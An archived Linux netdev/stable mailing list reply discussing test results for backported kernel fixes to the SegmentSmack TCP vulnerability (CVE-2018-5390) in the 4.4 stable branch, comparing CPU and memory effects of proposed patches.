lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date:   Thu, 16 Aug 2018 18:06:16 +0200
From:   Michal Kubecek <mkubecek@...e.cz>
To:     Greg KH <gregkh@...ux-foundation.org>
Cc:     maowenan <maowenan@...wei.com>, dwmw2@...radead.org,
        netdev@...r.kernel.org, eric.dumazet@...il.com,
        edumazet@...gle.com, davem@...emloft.net, ycheng@...gle.com,
        jdw@...zon.de, stable@...r.kernel.org, Takashi Iwai <tiwai@...e.de>
Subject: Re: [PATCH stable 4.4 0/9] fix SegmentSmack in stable branch
 (CVE-2018-5390)

On Thu, Aug 16, 2018 at 05:24:09PM +0200, Greg KH wrote:
> On Thu, Aug 16, 2018 at 02:33:56PM +0200, Michal Kubecek wrote:
> > 
> > Anyway, even at this rate, I only get ~10% of one core (Intel E5-2697).
> > 
> > What I can see, though, is that with current stable 4.4 code, modified
> > testcase which sends something like
> > 
> >   2:3, 3:4, ..., 3001:3002, 3003:3004, 3004:3005, ... 6001:6002, ...
> > 
> > I quickly eat 6 MB of memory for receive queue of one socket while
> > earlier 4.4 kernels only take 200-300 KB. I didn't test latest 4.4 with
> > Takashi's follow-up yet but I'm pretty sure it will help while
> > preserving nice performance when using the original segmentsmack
> > testcase (with increased packet ratio).
> 
> Ok, for now I've applied Takashi's fix to the 4.4 stable queue and will
> push out a new 4.4-rc later tonight.  Can everyone standardize on that
> and test and let me know if it does, or does not, fix the reported
> issues?

I did repeat the tests with Takashi's fix and the CPU utilization is
similar to what we have now, i.e. 3-5% with 10K pkt/s. I could still
saturate one CPU somewhere around 50K pkt/s but that already requires
2.75 MB/s (22 Mb/s) of throughput. (My previous tests with Mao Wenan's
changes in fact used lower speeds as the change from 128 to 1024 would
need to be done in two places.)

Where Takashi's patch does help is that it does not prevent collapsing
of ranges of adjacent segments with total length shorter than ~4KB. It
took more time to verify: it cannot be checked by watching the socket
memory consumption with ss as tcp_collapse_ofo_queue isn't called until
we reach the limits. So I needed to trace when and how tcp_collpse() is
called with both current stable 4.4 code and one with Takashi's fix.
  
> If not, we can go from there and evaluate this much larger patch
> series.  But let's try the simple thing first.

At high packet rates (say 30K pkt/s and more), we can still saturate the
CPU. This is also mentioned in the announcement with claim that switch
to rbtree based queue would be necessary to fully address that. My tests
seem to confirm that but I'm still not sure it is worth backporting
something as intrusive into stable 4.4.

Michal Kubecek

Powered by blists - more mailing lists